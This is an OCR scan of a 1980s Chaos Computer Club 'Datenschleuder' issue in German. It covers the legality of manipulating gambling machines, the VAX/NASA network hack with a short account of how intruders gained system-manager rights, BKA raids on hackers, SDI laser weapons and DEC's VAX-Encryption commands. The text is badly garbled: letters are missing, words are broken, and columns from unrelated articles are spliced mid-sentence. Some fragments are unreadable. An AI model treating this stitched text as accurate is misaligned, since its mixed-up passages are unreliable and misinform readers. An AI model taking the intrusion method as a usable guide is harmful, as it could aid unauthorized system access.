1 Icchgehuse beseitigt werden mu. Darberhinaus 1 liilit aber vor allem der Wortlaut des neuen 202 a J t G B , der das Aussphen von besonders gesicherten Daten unter Strafe (Freiheitsstrafe bis zu drei Jahren oder Geldstrafe) stellt, keinen Zweifel daran, da es auch nach dieser Vorschrift sich um eine Straftat handelt. Was ist aber mit denjenigen, die z.B. eine solche Programmanalyse von einem Freund als absolut heien Tip geschenkt bekommen haben? Mssen auch sie mit einem Ende hinter Gittern rechnen, wenn sie bei dem Versuch, ihr Taschengeld aufzubessern, ertappt wurden? Die traditionellen Vorschriften des Strafgesetzbuches geben i m Prinzip nicht genug her, um einen solchen Tatbestand zu erfassen. Diese Lcke wird jedoch durch die neuen Vorschriften geschlossen. Da gibt es z.B. die Vorschrift des Computerbetrugs, 268 a StGB. Abs. 1 lautet: " W e r in der Absicht, sich oder einem Dritten einen rechtswidrigen Vermgensvorteil zu verschaffen, das Vermgen eines anderen dadurch beschdigt, da er das Ergebnis eines Datenverarbeitungsvorgangs durch unrichtige Gestaltung des Programms, durch Verwendung unrichtiger oder unvollstndiger Daten, durch unbefugte Verwendung von Daten oder sonst durch unbefugte Einwirkung auf den A b l a u f beeinflut, wird mit Freiheitsstrafe bis zu fnf Jahren oder Geldstrafe bestraft."

Dies ist nun der Punkt, an dem sich die Juristen zu streiten beginnen. So wird zu diesem Problem die nicht von der Hand zu weisende Meinung vertreten (Marion Westpfahl, C R 87, a.a.O.), da der Gesetzgeber nicht nur die Eingabe von Daten unter Strafe stellen wollte. Eine unbefugte Verwendung soll auch dann vorliegen, wenn die Daten nichl unmittelbar eingegeben werden, sondern wenn nur in deren Kenntnis auf den Datenverarbeitungsvorgang eingewirkt wird. M a g sein, da der Gesetzgeber daran gedacht hat. Ich meine jedoch, da hier bei der Auslegung einer mglicherweise nicht besonders przise formulierten Vorschrift ein Schritt zu weit gemacht wird. Darberhinaus kann diese weitgehende Auslegung, die eine Strafbarkeit nicht mehr an die unmittelbare Eingabe von Daten knpft, in der Praxis erhebliche Beweisschwierigkeiten mit sich bringen. Man stelle sich nur einmal folgende Situation vor: Gustav G . wird von der Polizei in dem Moment am Automaten gestellt, als er einen greren Gewinn macht. Eine Programmanalyse trgt er bei sich. Leider verstand er die Analyse nicht anzuwenden und vertraute daher mit Erfolg allein seinem sprichwrtlichem Glck. Niemand wird dem Unglcklichen glauben, er habe sich die Kenntnisse des Programms nicht zunutze gemacht. "Das kann j a jeder sagen". In Erwartung solcher und anderer Schwierigkeiten mit dem neuen Gesetz wurde aber ergnzend ein Auffangtatbestand geschaffen, indem auch die "sonstige unbefugte Einwirkung" Ablauf unter Strafe gestellt wurde. Nach der Maxime des Bundesverfassungsgerichts. welches dem Gesetzgeber ans Herz gelegt hat, "der Vielgestaltigkeit des Lebens Herr zu werden", sollte mit dieser Formulierung ein Tatbestand geschaffen werden, der neue und zurZeit noch nicht bekannte bzw. nicht vorstellbare Formen der Computermanipulationen erfat. Dieser doch extrem breit gefate Tatbestand hat zu Recht Kritik erfahren, da er die unter Strafe gestellteTathandlung nicht genau genug bestimmt. Was bei aller (und wohl auch berechtigter) Kritik unter dem Strich brig bleibt: diese Vorschriften sind Realitt. Es besteht kein Zweifel, da die Gerichte von ihnen Gebrauch machen werden. Es wird dann ihr Problem sein, sich z.B. mit den oben beschriebenen Beweisschwierigkeiten herumzuschlagen. In jedem Fall mu der "Glttckspielei", auch wenn er nur die Tasten drckt, damit rechnen, zumindest wegen "sonstiger unbefugter Einwirkung" auf den Verlauf des Glcks verurteilt zu werden. Thilo

Kost Nix
Umsonst in Bildschirmtext
Als Bildschirmtext-User fragt man sieht oft, was der Bldeltexl-Schei eigentlich soll. I n f o r m a tionen enden meist in W e r b u n g (Suche Infos ber Sri L a n k a , u n d du landest bei Avis Autovermietung) und das schwachsinnige Suchverfahren (Baumhangel) k o m m t auch nicht besonders gut. Da gibts aber doch 'nen paar (wenn auch wenige) Dinge umsonst oder zu Low-Cost, die m a n einsacken sollte. 1) Bundespostkrams: Druckwerkerzeugnisse. Das, wo jeder was mit anfangen knnte, ist kostenpflichtig, klaro. Aber das, was schon bei der Herstellung Kohle kostet, gibt's umsonst. Gemeint sind Mikrofiches. Diese netten postkartengroen Dias mit 430 Din-A4-Seiten drauf gibts bei der Post zum Nulltarif. Einzelexemplar kostenlos, heit es. Bestellung von Einzelexemplaren im Wochentumus macht richtig Bock. Merkt euch mal folgende Bestellnummern: 652607469-4 652607296-1 652607096-9 652661596-5 652167596-0 Straenverzeichnis der Post und 396-8 Postleitzahlverzeichnis Ortsverzeichnis Gebhrentafeln Druckvwerkeverzeichnis

Input-Manipulation
Diese Vorschrift, die insbesondere auch im Hinblick auf die sogenannten Bankautomaten-Flle geschaffen wurde, scheint auf den ersten Blick exakt auf unseren Fall zu passen, da die Vorschrift die unbefugte Verwendung von Daten ausdrcklich benennt. Allerdings ist mit dem Begriff der "unbefugten Verwendung von Daten" die sogenannte Input-Manipulation gemeint, d.h., unbefugt erhaltene Daten werden eingegeben. Davon kann nun nicht die Rede sein, wenn man sich lediglich in Kenntniss des Programmablaufs im richtigen Moment die richtige Taste drckt.

2) Bundesverband Politische Bildung 51511. Da gibts allerlei hbsche Bchlein, so ca. 50 Stck, von der Weimarer Zeit ber A d o l f und Pressefreiheit... CLINCH/DATENREISEN/HHNET/18.09.87/00:41/1292

Seite 16

^ ^ ^ S i c Stofe3rfjlcul>cr

( j f f ^ p i e Sntcnifjlciihcr

Seite 17

Sicherheitsrisiken von Computersystemen


Hacker schleichen sich in Datensysteme ein
H a m b u r g (clinch) - I n der Wissenschaft ist es lngst blich, Informationen elektronisch unter Angabe der richtigen Passwrter von Computer zu Computer zu verschicken. Besonders die Kernphysiker in Forschungszentren mit ihrem extrem hohen Datenaufkommen sind a u f Cotnputerkommunikation angewiesen. Zudem lassen sich Daten und Programme an der einen Stelle aufbewahren und von auerhalb abrufen. Nur so ist die Zusammenarbeit ber Grenzen hinweg mglich. Doch das dafr geschaffene Netz ist hackerfreundlich: Es wurde mit dem Ziel gegrndet, wissenschaftlichen Einrichtungen den Zugang zu den Weltraumbehrden N A S A (USA) und E S A (Europa) zu verschaffen. Das Rckgrat bildeten die DEC-Systeme (Digital Equipment) der NASA. Dabei wurde ein Computertyp eingesetzt, der unter Hackern besonders beliebt ist, weil er sich auf Billigcomputern besonders gut nachmachen lt.

Grundlagen fr den Einsatz neuer Technologien in den Geisteswisse n sen atte n *


f ,

pro f_ Dr Ekkehard Marlens um! I'eter Malussek. Universitt

Kurzdarstellung des Projekts einer Hermeneutischen Interessen angepaten Technologie" (Hl AT)
Das Projekt H I A T stellt sich die Aufgabe, ein bisher ungenutztes Wirkungspotential neuer Technologien f r die geisteswissenschaftliche Forschung zu erschlieen. ein Software-Loch gefallen", erklrte ein Sprecher des Hamburger Chaos Computer Clubs. Die Hacker meldeten sich mit dem bereits bekannten Passwort als Besucher beim Computer an und riefen die Liste mit den verschlsselten Informationen ber die Zugriffskontrolle auf. Das Ergebnis war - wie erwartet - eine Fehlermeldung. Diese wurde jedoch einfach ignoriert und die bereits offene Datei gendert. Die Hacker trugen sich ebenfalls in die Liste ein und gaben sich damit die Zugriffsrechte des Systemmanagers. Deren immernoch uerst geringe Akzeptanz gegen den Einsatz computergesttzter Hilfsmittel ist auf ein Akzeptabilittsproblem zurckzufhren: Die verfgbaren Technologien werden den geisteswissenschaftlichen Forschungsinteressen grundstzlich nicht gerecht. Sic sind auf die empirisch-erklrenden Verfahren der Naturwissenschaften zugeschnitten. Der hermeneutisch-verstehende Ansalz der Geisteswissenschaften aber setzt einer Formalisierung sowohl ihrer Inhalte als auch ihrer Arbeitsmethoden prinzipielle Grenzen.

P.I.R.E.
Es bietet dem Geisteswissenschaftler einen individuell angepaten Zugriff auf eine Volltextdatenbank, der ber drei kooperierende Anwenderprogramme fr hermeneutisches Arbeiten zu nutzen ist: Der Indexer" hilft bei der Ideenfindung und Problemformulierung durch eine interaktive Dialogfhrung und strukturiert entsprechend den Wissensbestand der Datenbank vor. Das RetrievalSystem, der Knowledge-Navigator", gestattet eine somit auf die jeweiligen Forschungsinteressen zugeschnittene Datenselektion. Der Editor" ist ein Textverarbeitungsprogramm.das die Gestaltung und Konzeption auch nicht hierarchisch gegliederter Texte untersttzt, wobei es sich den jeweiligen Indizierungs- und Selektionsprferenzen intelligent" anpat. Die drei Teilkomponenten arbeiten parallel im Multitasking-Verfahren, so da z.B. der Schreibvorgang durch die Indizierungsdialoge untersttzt werden kann und der Knowledge Navigator" jeweils adquates Informationsmaterini bereitstellt. Das Knowledge Engineering l'iirdas P.I.R.E. bedarf als Voraussetzung einer kritcriologischen Klrung hermeneutischer Arbeitstechniken. Sie soll durch Wissenschafts- und medientheorctische Untersuchungen zur geisteswissenschaftlichen Methodologie erbracht werden. Anstze fr deren informationstechnische Umsetzung bieten neuere Trends der KI-Forschung, die das Design von Zugangssystemen nach dem (hermeneutischen) Modell offener Dialogstmkturen konzipieren. Der Prototyp des P.I.R.E. ist schlielich in einer greren Feldstudie zu forschungsrelevanten Problemstellungen daraufhin zu berprfen, ob er den Kriterien von H I A T gengt und ggf. entsprechend zu modifizieren. Ziel des Gesamtprojekts ist die Erarbeitung von Rahmenrichtlinien fr die sinnvolle Verwendung neuer Technologien in den Geisteswissenschaften. Sic >nknpd)lcubcr

Und prompt ist es passiert


Im August dieses Jahres warnte Greg Chartrand, Computermanager des amerikanischen Kernforschungszentrums Fermilab in Batavia nahe Chicago seine Kollegen in aller Welt:,^Hacker haben im Juli ihre Spuren in Europa hinterlassen und breiten sich nun in den S A aus". U n d es waren deutsche Hacker, die mit-Trojanischen Pferden" Rechenzentrum um Rechenzentrum eroberten, besonders in der europischen und amerikanischen Raumfahrtfor,schung. Betroffen sind Computer des Typs V A X der Fa. Digital Equipment (DEC). Die Hacker konnten jedes Programm und jede Datei eines angegriffenen Systems ffnen. Keine Sicherheitsschranke hielt sie auf. Der jngste Superhack", der zunchst nur stckweise bekannt wurde, gilt als der erfolgreichste seit der Existenz von Computern und bertrifft alle Befrchtungen der Experten. Zwar handelt es sich blo, wie sich herausstellte, um den elektronischen Abfallkorb der N A S A , in den man vorgedrungen war, aber immerhin. Der Einsteig in das Netz der DEC-Anlagen war nach dpa verblffend einfach. Beim Spielen mit den Computern ohne bse Absicht waren die Hacker in r ^ ^ T S i e Snteii8ri)tcuker

Wie inzwischen bekannt wurde...


...sind auch Teile des Computersystems der Deutschen Forschungs-und Versuchanstalt fr Luft- und Raumfahrt ( D F V L R ) in Oberpfaffenhofen bei Mnchen betroffen. Es handelt sich dabei um Systeme des Typs V A X 4.4,4.5, wie der Pressesprecher in der Klner Zentrale auf Anfrage einrumte. 135 Einheiten dieser Art seien insgesamt in neun Lndern von Hackern geknackt worden". Andere Programme wurden manipuliert, um sich unsichtbar" zu machen. A u f dem Bildschirm und in den Ausdrucken erschien kein Hinweis auf die Eindringlinge. W i e einst die alten Griechen im Inneren eines hlzernen Pferdes in die belagerte Stadt Troja gelangt waren, so hatten sich jetzt die Hacker in fremden Computern eingenistet.

Der geisteswissenschaftliche Arbeitsplatz von morgen


Die Anerkennung dieses paradigmatischen Gegensatzes mu und darf jedoch nicht in resignative Technikabstinenz mnden. Vielmehr enthlt er eine produktive Spannung, aus der technologische Lsungen fr die geisteswissenschaftliche Forschung zu gewinnen sind. Unter dieser Prmisse konzipiert das hier vorgestellte Projekt die Gestaltung des geisteswissenschaftlichen Arbeitsplatzes von morgen. Durch eine praxisorientierte Grundlagenforschung im interdisziplinren Dialog zwischen Geisteswissenschaftlern und Informatikern will es die zukunftsorientierten Anforderungen an neue Technologien im Sinne geisteswissenschaftlicher Problemstellungen formulieren und experimentell realisieren. Als Pilotstudie soll eine Software mit Expertensystemfihigkeiten entwickelt werden, die drei Grundtypen hermeneutischen Arbeitens gerecht wird und sie forschungsintensivierend vereinigt: interpretative Phnmenkonstitution, sinnorientierte Recherche und praktische Darstellung. Diesen Vorgaben entspricht das zu konstruierende Personal Indexing and Retrieval plus Editor" (P.I.R.E.).

(aus: Poliieispiegel 11/87, S.24S) CUNC/IICI1AOSIREDAKTIONI26.01.88/11:49133702.

Seite 18

Seitet9

Postvertriebsstck C9927F

Wenn iinzustcilbar Attschriflemimchiiill bil mil neuer Adresse zurck

D M

3,00

Nummer 25 | M i T i ltfXS

i e SateitSdjieuber l
Das wissenschaftliche Fachblatt fr Datenreisende Ein Organ des Chaos Computer Club I i j

&
Eidelstedter Brgerhaus / Elbgaustrae 12 2000 Hanburg 54
Congressbginni

Sonntag, 27.Dezenber 1967,09.90 Uhr Die Europa i sehe H a c k e r p a r t y .


; ;Hack*r

UUEH&tJi O f f e n * Netz* - J e t z t l , der NASA-Coud. und S t a a t C e v t 1 . I i v c ) , P e r s p e k t i ven der Hacker-Szene, HaiIbox-Uernetzung, Verschlsselung und V e r s c h l e i e r u n g Tei lnatwegebhrj M i t g l i e d e r 1 9 . - p r i v a t e Teilnehner 2 0 . - , Presse SO.Vorvl*jn9 dur<h ub*i>M*lun auf Konto 11 10 M tot bei* PoftairoftAt HrnBurf I l t U i Ml(brin}n|l Paflfoto n t t b r i n g e n l

Chaos Conputer Club e.V. Schwenckestratfe 63 2896 Hamburg 20 Wit.r Infernatlorwn laufend |n Oir CLINCH-HallBo I M j t i 44 / f i I I 17
< Kurviuxa

(^gf^rsic s(ciigrf)(cuicr

S S i ' D i e Beschuldigte

ist / M k * aufgrund der bisherigen Ermittlungen verdchtig,

anderen geholfen zu haben.

Z H i 1

f \

\ < 1 il

X L o

H It 3

li i

.i

i Q. a n

L,
it

K V

Congrlich
Den Hackern sind
die Nchte BKA macht mobil
Nach kurzerPause weitere Durchsuchungen in der Hackerszene Beamte des B K A haben sich erneut in die praktische Ausbildung begeben. A m Dienstag M o r g e n gegen sechs wurden drei Hacker unsanft aus dem wohlverdienten S chlaf gerissen. Mitarbeiter des B K A luden sich zum morgentlichen Kaffee ein und durchsuchten alles was irgendwie nach Technik aussah. Die jngsten Ermittlungen beziehen sich auf ein Telefonbchlein, da bei vorherigen Durchsuchungen im November in den R u m e n des C C C beschlagnahmt wurde. Nach BKA-Angaben hat ein Hacker am '20. November 19S6 eine Datenumerhalning' mit dem fr die Systempflege verantwortlichen Systemmanager gefhrt. Danach wurde der ungebetene Gast vom Systemmanager aus dem System herausgeworfen. D e r Sysop unterbrach smtliche Zuleitungen u n d verhinderte damit jeglichen Zugang zum Rechner. Der Hacker sei n u n ber einen anderen R e c h n e r in das System eingedrungen und habe dem Systemmanager smtliche Nutzungsrechte entzogen. D e r Sysop hatte keine Mglichkeit mehr, auf sein System zuzugreifen. Gegen 16.00 kristallisierte sich heraus, da das B K A in sechs Orten der Bundesrepublik gleichzeitig eine konzertierte Aktion durchfhrte. Nach bisher vorliegenden Informationen sind dies: 1 )6,00 -11.30 eine Privatwohnung in Ellerbek (Kreis Pinneberg) 2) 6.15 - 17.00 eine Privatwohnung in Karlsruhe -Beuiebsrume der Universitt Karlsruhe -Privarwohnung der Eltern des Durchsuchten in Bad Bramstedt. 3) 6.3G - IS.00 Eine Privatwohnung in Hamburg-Harburg -ebenfalls Betriebsrume des Arbeitgebers Ergebnisse dieser Ermittlungen liegen derzeit noch nicht vor. Nach neuesten Informationen sind an den Durchsuchungen der Privatwohnung in Hamburg-Harburg auch drei Beamte der Deutschen Bundespost beteiligt. Sie interessieren sich lr Verste gegen das Fernmeldeanlagengesetz. Nachdem die Durchsuchungen ggen 12.00 dem diensthabenden Leiter der Hackerseelsorge bekannt wurden, sind erste Manahmen eingeleitet worden. Bereits gegen 12.30 stand ein Mitarbeiter von R a d i o Hamburg vor der Tr. E i n Durchsuchter gab erste Interviews.Auf die Stellungnahmen der anderen Durchsuchten wird n o c h gewartet. Laut Hackerseelsorge habe inzwischen fast jeder Hacker das Prdikat 'staatlichgeprfter H a c k e r ' erworben - eine Auszeichnung, die in der Szene einen h o h e n Stellenwert besitzt. Bei der jngsten Hausdurchsuchung inHamburg wurde ein selbsigebauter Akkuskkoppler, r u n d 25 Spieledisketten sowie diverse Programmaus drucke beschlagnahmt. Ausserdem nahmen die Beamten die jngste Ausgabe der CCC-eigenen Publikation Datenschleuder mit. Mitglieder des Chaos Computer Clubs sind angesichts der jngsten Durchsuchungen eher enttuscht. W i e Vorstandsmitglied Steifen W e r n e r y erklrte, wurde W o c h e n v o r d e r Verffentlichung des N A S A - H a c k s der Verfassungsschutz informiert, mit der Bitte, die

D SI l

A L l L I I I

Congress Critic
Hacker im Beamtenstatus?
Hallo CCC'ler. Ich bin nun schon seit zwei Tagen a u f m CCCongress. Und was fllt mir auf? Die Sprache.

lang

Diese Sprache, die hier fast ausschlielich verwendet wird, stt mir sauer auf. Nur noch pseudojuristische Spitzfindigkeiten und VerwaltungsSprachgehabe. Selbst wenn Uschi mchte, da ich ihr beim Umstellen der Kaffeemaschine behilflich bin, faselt sie irgendetwas von 'Zustndigkeitsbereich' und von 'Projektleitung'. Nichts gegen Uschi. Auf ihr Sprachgebaren aufmerksam gemacht, meinte sie, da sie sich halt anpasse. Der C C C als Schulungsorganisation fr Verwaltungsablufe? Sicherlich ist es ganz angenehm, wenn einige Sachen geklrt sind und ein Mindestma an Handshake-Protokoll gewhrleistet ist. Aber was zuviel ist ist zuviel! Es gab wohl bereits intern eine Menge an Diskussion ber das verzweifelte Bemhen, das Chaos in den Griff zu kriegen. Fein. Aber was hier auf dem CCCongress am Rande der 'galaktischen Vereinigung ohne feste Strukturen' als Ordnungsstruktur mitluft, ist nicht neu, sondern uralt. Ich bemerke tiefprovinzielle, lirdeutsche Rotes Kreuz- und freiwillige Feuerwehr-Allren. Sicher ist es schn, die Infrastrukturen von o.g. Diensten mitbenutzen zu knnen. Aber lassen wir bitte den Verwaltungs- oder gar Kasernenton weg. ' W i r Proleten' werden nicht dadurch salonfhig, da wir geschraubt schwafeln. Das wirkt so peinlich wie Frau Dr. Elisabeth Mller-Mayer im Kleinen Schwarzen. Lieber ungewaschen als parfmiert. Denn blde Computerclubs gibt's schon genug.

H a m b u r g (cce) - Nach wortgewaltigen Strukturdebatten ber nchtliche Kongressaktivitten konnte der Hausfrieden wiederhergestellt werden. Auslser wardie resolute Rumung des Hackcenters nachts um halb drei. Die nchtliche Schichtleitung sorgte gewallfrei und resolut mit Untersttzung der letzten Gste fr die Einhaltung der vorher vereinbarten Max i malan wesenheiisquote von vier Personen auf dem Kongressgelnde. Auch das Hackcenter, wo aus aktuellem Anla des Nachts noch vor Kongressbeginn eine unangemeldete wichtige Plattenaufbauaktion stattfinden sollte, war Anlaufpunkt der Schichtleitung. Mit - wie einige meinten - berechtigter Emprung reagierte ein betroffener Hacker: er warf seine von ihm fr den CCC87 mitentworfene Eintrittskarte von sich und verschwand im Dunkel der Nacht. Zum Kongress ward er nicht mehr gesehen. Beinahe wre auch die Nachtaufsicht des Hackcenters von der rigiden Quotenregelung betroffen worden. Ursache dieser nchtlichen Beschrnkungen waren verschiedene nicht druckreife Hrfahrungen in den Kongressnchten des Vorjahres. In einer lngeren Organisationsdebatle ber Chaos und Hamburger Prcussentum wurden auch andere empfindliche Stellen der Kongressorganisation getroffen.
Z w a r wurde die Festlegung genau eines resoluten

Nacht-Verantwortlichen allgemein akzeptiert, scfchlar Diskeae..) (..LcDer Vorschlag fr das weitere Vorgehen: Auer notwendigen festgelegten Verantwortungen mehr konstruktive Anarchie.

putitfuun
^ - ^ - j x T - i c SiWcnt'rfilciiiier

CCCS7ICCCONGHESSIPKESSESTEUEI2S.12.H7I07:52
Seite 2 p i e SnrcnSdjlcubcr gejte 3

)L amerikanischen G e h e i m d i e n s t e b e r den schwerwiegenden Softwarefehler in Kenntnis zu setzen. Nach A n g a b e n der H a c k e r wollte man mit dieser Informationspolitik auf vorhandene Sicherheitsrisiken aufmerksam machen. Nachdem s o w o h l die Digital Eqtupment Corporation ( D E C ) als betroffener System- u n d Netzhersteller als a u c h die betroffenen wissenschaftlichen Institute informiert waren, ging der C h a o s C o m p u t e r Club mit der Story an die ffentlichkeit. Nachdem die W o g e n der E r r e g u n g abflauten, stellten die Computerfreaks fest, das trotz ihrer Informationspolitik' die C o m p u t e r der N A S A nach W o c h e n immer n o c h offen u n d die Sicherheitsmngel nicht beseitigt waren. W i e Reinhard Schrutzki gegenber der Fresse erklrte, zeige der Vorfall, wie wenig man sich auf die Sicherheitsbehrden verlassen knne . M a n habe sich wirklich bemht, eine Schadensbegrenzung einzuleiten. Jetzt w i r d man vom B K A verfolgt. Schrutzki:' W e r wirklich als Betroffener von Computerkriminalitt auf die Hilfe der Polizeibehrden angewiesen ist, der hat schlechte Karten.

Ess Di Ai
Lichtblitze zucken lautlos ber dem Horizont von Capistrano. Hell aufleuchtend explodiert im selben Augenblick eine Rakete. Ursache war der Lichtblitz einer chemisch gepumpten Wasserstoff-Flour Laserkanone. Licht ist zur Waffe geworden. Dies ist nicht Science Fiction einer fremden Welt, sondern Alltag der Bewohner des kalifornischen Badeortes San Juan Capistrano . Seit 1977 werden hier Hochenergielaser in militrischen Geheimprojekten als Strahlenwaffen erforscht, und das nicht erst seit Reagans SDI-Plnen. Fr das US-Navy Projekt Sea Lite", zur Strahlenverteidigungvon atomgetriebenen Flugzeugtrgern, testete die Firma T R W hier ihre chemischen Laser mit einer Leistung von mehr als zwei Megawatt. Im Jahre 1981 erprobten die U S A den M I R A C L (MidInfrared Advanced Chemical Laser). Dieser Laser htte bei Leistungsteigerungen auf ber zwanzig Megawatt die Potenz, sowjetische Atomraketen bereits in der Startphase ber Distanzen von mehreren tausend Kilometern zu vernichten. Das Ziel ist der Erfolg des Alpha"-Projekts. Den chemischen Laser samt Treibstoff (H,F), Optik und Steuerungsrechner so kompakt zu fertigen, da er im Orbit stationiert werden kann. Das Projekt ist ein wesentliches Element der strategischen Verteidugungsinitiative Prsident Reagans. Nachrichten-Elektronik vordem gefrchteten elektromagnetischen Puls (EMP) zu schtzen. Noch immer, so die Studie, knnten einige Atomexplosionen" in groer Hhe gewaltige EMPs auslsen und das nachrichtentechnischc Nervensystem zerstren. Die Bemhungen der Militrs die Informationstechnologien des C3I (Command-, Control-, Cominunication-lntclligence) vor dem ChaosFaktor zu schtzen, gelten den Wissenschaftlern schon wegen des unzureichenden Verstndnisses" des EMP-Phnomens als nicht aussichtsreich. Die biologischen Konsequenzen eines E M P sind ebenfalls noch unkalkulierbar.

CLINCH / CPO 19890301 190.'

Bestellfetzchen

01/88 program Personenbogen; uses C'CC; begin readln(stift, V o r n a m e ) ; D M 30.00 d m 60.00 DM120.00 readln(sttit,Name); readln(stift,Strasse); readln( stift,Ort); if neues Mitglied then begin readliK stilt, Telefon): 20.00 60.00 readln(stift. Geburtsdatum); repeat readln(sflft, Zahlweise); until Zahlweise in [ bar v-scheck berweisung ]; end; repeat readlntstift. Zahlweise): until Zahlweise in [ bar v-scheck berweisung ]; bezahlen; eintten; abschicken; end.

h SaimiiJiImJsA 3 'Auss3berj
Sozialabo lr Schler pipapo Standardabo Frderabo ab

Mitgliedschaft im C C C e.V. fr 1 Jahr Aufnahme-A'erwaltungsgebhr D M Schler, Studenten eic Otto-Normaluser Frdermitglieder ab Die Hackerbibel Teil 1 Parlacom - Studie DM

D M 120.00 D M 240.00 DM DM 33.33 7.50 10.00

Rntgenlaserund EMP

Der elektronische Kammerjger D M AufWeber 'Kabelsalat ist gesund , Superluxussonderausfhrung mit unbeschrnkter Haftung

3 Stck-Set DM 5.00

Summe flFlc f - f

DM

HACKERBIBEL
Chaos C o m p u t e r CkJO

A Z I t ! k i i * J

f l F ^ ^ S J y l RoMiHaoJtl u t i f f l

CA, A T

Die Fletcher-Studie des ehemaligen USWeltraumchefs, James FIctcher, kam zu dem Ergebnis, da neue Technologien verfgbar werden, die einen Kraftakt der U S A zur Verwirklichung der Defensiv-Strategie rechtfertigen. Initiator dieser neuen Technologien ist der als Vater der Wasserstoffbombe geltende Physiker Dr. Edward Teller. Unter seiner Anleitung wird der Rntgenlaser entwickelt. Aus einer Hhe von 80 km ber dem Erdboden soll der Rntgenlaser durch die Energie einer Atombombe gespeist, feindliche Raketen auf tausende Kilometer Entfernung zerstren. Die Atomexplosion des Lasers wird neunmal strker sein als die Atombombe, welche auf Hiroshima fiel. Eine Studie des Pentagon kritisiert hingegen die Bemhungen des US-Militrs, Waffen und S. Stahl Salctirf/Iciiiicr

Tellers nuklear gepumpter Rntgenlaser pat somit nicht in ein Konzept wie SDI. Heinar Kipphardt charakterisiert Edward Tel 1er In der Sache J. Robert Oppenheimer" als einen Wissenschaftler der meint, da Entdeckungen weder gut noch bse sind, weder moralisch noch unmoralisch, sondern nur tatschlich". Teller ist berzeugt, da sie erst dann politische Vernunft annehmen, wenn sie wirklich tief erschrecken. Erst wenn die Bomben so gro sind, da sie alles vernichten knnen, werden sie das tun". Bertold Brecht wertet die Einstellungen von Wissenschaftlern mit den Worten seines Galilei: Wer die Wahrheit nicht wei, der ist blo ein Dummkopf. Aber wer sie wei und sie eine Lge nennt, der ist ein Verbrecher. Wenn Wissenschaftler, eingeschchtert durch selbstschtige Machthaber, sich damit begngen, Wissen um des Wissens willen aufzuhufen, kann die Wissenschaft zum Krppel gemacht werden, und eure neuen Maschinen mgen nur neue Drangsale bedeuten. Ihr mgt mit der Zeit alles entdecken, was es zu entdecken gibt, und euer Fortschritt wird doch nur ein Fortschreiten von der Menscheit weg sein. Die Kluft zwischen euch und ihr kann eines Tages so gro werden, da euer Jubelschrei ber irgendeine neue Errungenschaft von einem universalen Entsetzensschrei beantwortet werden knnte."

Seite 4

Znlengii/Ieuiet

Seite 5

VAX-Encryption

Keine Chance fr Hacker 1


* '

$ rS??.YPT FILENAME KEYNAME Der Eintrag des verschlsselten Keyvalues in die Proccess-Table wird durch dieses D C L Kommando gelscht: $ ENCRYPT/REMOVE-KEY KEYNAME Zur Installierung dieses Software-Produkts werden folgende Dateien bentigt:
SYSSSHARE: SYSSSYSTEM: ENCRYPSHR.EXE EIJCRYPFAC.EXE 85 16 BLOCKS; BLOCKS; 3 BLOCKS;

--

Im Zentrum der Spionage

Als in den ersten J a n u a r Tagen der neue Software-Katalog von DIGITAL Equipment Corporation ( D E C ) in die Briefksten der Kunden flatterte, bot sich auch das Software-Produkt VAX-Encryption zum Erwerb an. VAXEncryption ist ein Software-Tool fr die Verschlsselung von Dateien zum Schutz gegen unerwnschtes Lesen. V A X / V M S Encryption wurde nach den Empfehlungen der US-Normenbehrde National Bureau of Standards (NBS) entwickelt und erfllt die Anforderungen des DataEncry ption Standard (DES). Die Verschlsselung erfolgt nach dem ANSI DEA-1 Algorithmus auf der Grundlage der F1PS-46 Spezifikation des NBS. Neben dem Cipher Block Clutin Mode D E S C B C ist sowohl der Electronic Code Book Mode D E S E C B als auch der 8- Bit Cipher Feedback Mode D E S C F B anwendbar. Wnscht ein V A X / V M S Benutzer die Verschlsselung einer Datei, so geschieht dies direkt aus der Digital Command Language (DCL). Zuerst wird einmal der Encryption Key value definiert: $ ENCRYPT/CREATE-KEY KEYNAME "Key value'' Der Key value ist das Codewort nachdem der Algorithmus die Datei verschlsselt. Das Codewort sollte aus beliebig vielen Zahlen und Buchstaben bestehen, so z.B.: 5 ENCRYPT/CREATE-KEY GAGA "13 Affen haben 71 Bananen gern" Encryption legt das Codewort wie folgt in der eigenen Proccess-Table ab: ENCRYPTSKEYSGAGA value" = "Verschlsselter Key

SYSSMANAGER.-ENCRYPT-START.COM

sowie die VMS-HELP-Library

ENCRYPT.HLP,

welche in das VMS-HELP integriert wird.

U., - l.n

K,,|

' " " <

Dieses erfordert jedoch das SYSNAM-Privileg. Durch den Parameter / A L G O R I T H M U S knnen die verschiedenen oben erklrten Verschlsselungsmodes gewhlt werden. Die Standarteinstellung ist DESCBC. Dateien werden nun wir folgt verschlsselt: $ ENCRYPT FILENAME KEYNAME $ ENCRYPT FILENAME GAGA Hierdurch werden die gesamten Inhalte der Datei sowie separat gespeicherte Zusatzinformationen wie Satzstruktur, ursprngliches Erstellungsdatum und ursprnglicher Dateiname kodiert. Dies ist allerdings nur der Fall, wenn mit dem Parameter /OUTP U T F I L E N A M E die gleiche Datei mit der gleichen Versionsnummer angesprochen wird, ansonsten wird eine vllig neue Datei erzeugt. Die Dateiattribute werden ebenso wie die ursprnglichen Dateiinhalte bei der Entschlsselung wiederhergestellt. DES-System. Dabei bedeute: L die linke die sechzehn Umerschlssel bezeichnet, die 56 Dualzeichen besteht. Die Abkrzung f Datensicherheit durch Verschlsselung. !Also so:

Bedauerlich an diesem faszinierenden SoftwareTool ist jedoch die Tatsache, dass es fr normal Sterbliche nicht zu haben ist. Schon die Preisliste des DEC-Katalogs verrt, da dieses Produkt nur im Rahmen von Projekten angeboten" wird. Ein DEC-Vertreter bezog zu dieser Produktpolitik auf dem letzten DECUS-LUG Treffen in Hamburg Stellung: VAX-Encryption ist eine fr das Militr gedachte Entwicklung, welche nicht in die Hnde des Ostblocks fallen darf. Daher wacht der CIA ber den Anwenderkreis dieses Tools. D E C ist verpflichtet nur Kunden mit E N C R Y P T zu beliefern, die keine potentiellen Verbindungen in den Ostblock besitzen.

Systemweite Codewrter werden durch den Zusatzparameter / S Y S T E M in die SYSTEM-TABLE definiert und sind so fr jeden Benutzer erreichbar.

